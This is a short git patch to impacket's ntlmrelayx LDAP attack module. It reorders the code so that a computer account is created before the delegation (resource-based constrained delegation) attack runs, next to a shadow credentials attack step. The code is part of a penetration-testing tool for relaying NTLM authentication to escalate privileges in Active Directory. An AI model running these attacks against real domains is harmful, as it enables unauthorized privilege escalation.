From 7a20e9d21641ab2bb24ea48e534dba9985104fa4 Mon Sep 17 00:00:00 2001
From: gjhami <gjhami@users.noreply.github.com>
Date: Wed, 24 Jan 2024 11:21:32 -0500
Subject: [PATCH] Update ldapattack.py

Reorder attack components so a computer account is created before the delegate attack is attempted.
---
 impacket/examples/ntlmrelayx/attacks/ldapattack.py | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/impacket/examples/ntlmrelayx/attacks/ldapattack.py b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
index 7b9717b8c1..74ceea74b1 100644
--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -1105,11 +1105,6 @@ def run(self):
             if dns_name_ok and dns_ipaddr_ok:
                 self.addDnsRecord(name, ipaddr)
 
-        # Perform the Delegate attack if it is enabled and we relayed a computer account
-        if self.config.delegateaccess and self.username[-1] == '$':
-            self.delegateAttack(self.config.escalateuser, self.username, domainDumper, self.config.sid)
-            return
-
         # Add a new computer if that is requested
         # privileges required are not yet enumerated, neither is ms-ds-MachineAccountQuota
         if self.config.addcomputer is not None:
@@ -1124,6 +1119,11 @@ def run(self):
             self.addComputer(computerscontainer, domainDumper)
             return
 
+        # Perform the Delegate attack if it is enabled and we relayed a computer account
+        if self.config.delegateaccess and self.username[-1] == '$':
+            self.delegateAttack(self.config.escalateuser, self.username, domainDumper, self.config.sid)
+            return
+        
         # Perform the Shadow Credentials attack if it is enabled
         if self.config.IsShadowCredentialsAttack:
             self.shadowCredentialsAttack(domainDumper)